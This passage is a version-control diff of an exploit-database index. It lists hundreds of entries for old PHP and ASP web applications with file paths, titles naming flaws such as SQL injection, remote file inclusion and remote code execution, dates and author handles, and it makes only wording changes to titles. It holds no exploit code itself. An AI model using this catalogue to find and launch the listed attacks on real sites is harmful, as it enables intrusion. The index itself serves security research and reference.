4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - 'notas.asp nota_id' SQL Injection",2007-09-26,ka0x,asp,webapps,0 -4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 +4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php view' Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 @@ -18735,7 +18736,7 @@ id,file,description,date,author,platform,type,port 4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 -4477,platforms/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 +4477,platforms/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusions",2007-10-01,kezzap66345,php,webapps,0 4480,platforms/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,php,webapps,0 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 - (form) Remote File Inclusion",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps,0 @@ -18759,7 +18760,7 @@ id,file,description,date,author,platform,type,port 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps,0 4507,platforms/php/webapps/4507.txt,"Joomla! Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 -4508,platforms/php/webapps/4508.txt,"Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusion",2007-10-10,NoGe,php,webapps,0 +4508,platforms/php/webapps/4508.txt,"Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusions",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,php,webapps,0 4510,platforms/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash Exploitation Vector",2007-10-10,ShAnKaR,php,webapps,0 4511,platforms/php/webapps/4511.pl,"cpDynaLinks 1.02 - 'category.php' SQL Injection",2007-10-10,ka0x,php,webapps,0 @@ -18780,13 +18781,13 @@ id,file,description,date,author,platform,type,port 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - 'language.php' Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 -4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 +4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusions",2007-10-18,S.W.A.T.,php,webapps,0 4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0 4548,platforms/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,php,webapps,0 4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps,0 -4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusion",2007-10-21,GoLd_M,php,webapps,0 +4551,platforms/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,php,webapps,0 4554,platforms/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",2007-10-22,BiNgZa,php,webapps,0 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 @@ -18794,9 +18795,9 @@ id,file,description,date,author,platform,type,port 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4562,platforms/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4563,platforms/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",2007-10-23,BiNgZa,php,webapps,0 -4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusion",2007-10-23,Civi,php,webapps,0 +4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusions",2007-10-23,Civi,php,webapps,0 4568,platforms/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,php,webapps,0 -4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 +4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2007-10-27,GoLd_M,php,webapps,0 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 @@ -18805,7 +18806,7 @@ id,file,description,date,author,platform,type,port 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0 -4587,platforms/php/webapps/4587.txt,"MiniBB 2.1 - 'table' Parameter SQL Injection",2007-10-30,irk4z,php,webapps,0 +4587,platforms/php/webapps/4587.txt,"MiniBB 2.1 - 'table' SQL Injection",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 @@ -18813,13 +18814,13 @@ id,file,description,date,author,platform,type,port 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 -4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 +4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusions",2007-11-02,GoLd_M,php,webapps,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - 'includes.inc selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 -4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Parameter Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 +4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 4607,platforms/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - (cmsdir) Remote File Inclusion",2007-11-04,mdx,php,webapps,0 4608,platforms/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps,0 4609,platforms/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps,0 @@ -18836,7 +18837,7 @@ id,file,description,date,author,platform,type,port 4627,platforms/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps,0 4629,platforms/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps,0 -4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 +4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps,0 4631,platforms/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 4632,platforms/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps,0 @@ -18846,7 +18847,7 @@ id,file,description,date,author,platform,type,port 4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - Local File Inclusion / SQL Injection",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps,0 -4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0 +4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusions",2007-11-21,NoGe,php,webapps,0 4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 @@ -18862,7 +18863,7 @@ id,file,description,date,author,platform,type,port 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0 4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0 -4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0 +4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusions",2007-11-25,ShAy6oOoN,php,webapps,0 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0 4662,platforms/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 @@ -18872,8 +18873,8 @@ id,file,description,date,author,platform,type,port 4668,platforms/php/webapps/4668.txt,"wpQuiz 2.7 - Multiple SQL Injections",2007-11-27,Kacper,php,webapps,0 4669,platforms/php/webapps/4669.txt,"project alumni 1.0.9 - 'index.php act' Local File Inclusion",2007-11-27,tomplixsee,php,webapps,0 4670,platforms/php/webapps/4670.txt,"PHP-CON 1.3 - 'include.php' Remote File Inclusion",2007-11-28,GoLd_M,php,webapps,0 -4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 -4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusion",2007-11-28,MhZ91,php,webapps,0 +4671,platforms/php/webapps/4671.txt,"EHCP 0.22.8 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps,0 +4672,platforms/php/webapps/4672.txt,"Charrays CMS 0.9.3 - Multiple Remote File Inclusions",2007-11-28,MhZ91,php,webapps,0 4674,platforms/php/webapps/4674.txt,"TuMusika Evolution 1.7R5 - Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4675,platforms/php/webapps/4675.txt,"NoAh 0.9 pre 1.2 - (filepath) Remote File Disclosure",2007-11-28,GoLd_M,php,webapps,0 4676,platforms/php/webapps/4676.txt,"Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure",2007-11-29,Evil.Man,php,webapps,0 @@ -18882,11 +18883,11 @@ id,file,description,date,author,platform,type,port 4679,platforms/php/webapps/4679.txt,"KML share 1.1 - 'region.php layer' Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps,0 -4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 +4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusions",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Local/Remote File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 -4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0 +4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - 'index.php link' Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 @@ -18916,7 +18917,7 @@ id,file,description,date,author,platform,type,port 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0 -4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 +4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusions",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 @@ -18932,7 +18933,7 @@ id,file,description,date,author,platform,type,port 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 - Local File Inclusion / SQL Injection",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 - (page) Remote File Disclosure",2007-12-21,irk4z,php,webapps,0 -4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusion",2007-12-21,MhZ91,php,webapps,0 +4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 - Multiple Local File Inclusions",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - 'category.php' SQL Injection",2007-12-22,Koller,php,webapps,0 @@ -18959,7 +18960,7 @@ id,file,description,date,author,platform,type,port 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (All Modules) SQL Injection",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0 -4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0 +4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Local File Inclusion",2007-12-26,irk4z,php,webapps,0 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0 @@ -18976,15 +18977,15 @@ id,file,description,date,author,platform,type,port 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 -4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' Parameter SQL Injection",2007-12-30,IHTeam,php,webapps,0 -4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' Parameter SQL Injection",2007-12-31,MhZ91,php,webapps,0 +4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' SQL Injection",2007-12-30,IHTeam,php,webapps,0 +4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 (Final) - Multiple SQL Injections",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php albumnr' SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - 'download2.php' File Disclosure",2008-01-01,GoLd_M,php,webapps,0 -4830,platforms/php/webapps/4830.txt,"ClipShare - 'UID' Parameter SQL Injection",2008-01-02,Krit,php,webapps,0 +4830,platforms/php/webapps/4830.txt,"ClipShare - 'UID' SQL Injection",2008-01-02,Krit,php,webapps,0 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Local/Remote File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 @@ -19002,7 +19003,7 @@ id,file,description,date,author,platform,type,port 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass",2008-01-06,r3dm0v3,asp,webapps,0 -4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 +4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4852,platforms/php/webapps/4852.txt,"NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps,0 @@ -19017,7 +19018,7 @@ id,file,description,date,author,platform,type,port 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a - SQL Injection / Cross-Site Scripting",2008-01-08,seaofglass,php,webapps,0 -4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' Parameter SQL Injection",2008-01-08,ka0x,php,webapps,0 +4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 - 'id_actividad' SQL Injection",2008-01-08,ka0x,php,webapps,0 4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 @@ -19028,139 +19029,139 @@ id,file,description,date,author,platform,type,port 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 4886,platforms/php/webapps/4886.pl,"iGaming CMS 1.3.1/1.5 - SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 -4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - 'user_id' Parameter SQL Injection",2008-01-11,j0j0,php,webapps,0 -4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' Parameter SQL Injection",2008-01-11,MhZ91,php,webapps,0 -4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0 +4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - 'user_id' SQL Injection",2008-01-11,j0j0,php,webapps,0 +4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - 'cat' SQL Injection",2008-01-11,MhZ91,php,webapps,0 +4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusions",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - 'unset()' bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - 'lib.regset.php/non-blind' SQL Injection",2008-01-11,rgod,php,webapps,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 -4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Parameter Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 +4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 4898,platforms/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0 4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - 'Username' SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 -4904,platforms/php/webapps/4904.txt,"Binn SBuilder - 'nid' Parameter Blind SQL Injection",2008-01-13,JosS,php,webapps,0 +4904,platforms/php/webapps/4904.txt,"Binn SBuilder - 'nid' Blind SQL Injection",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 -4907,platforms/php/webapps/4907.py,"X7 Chat 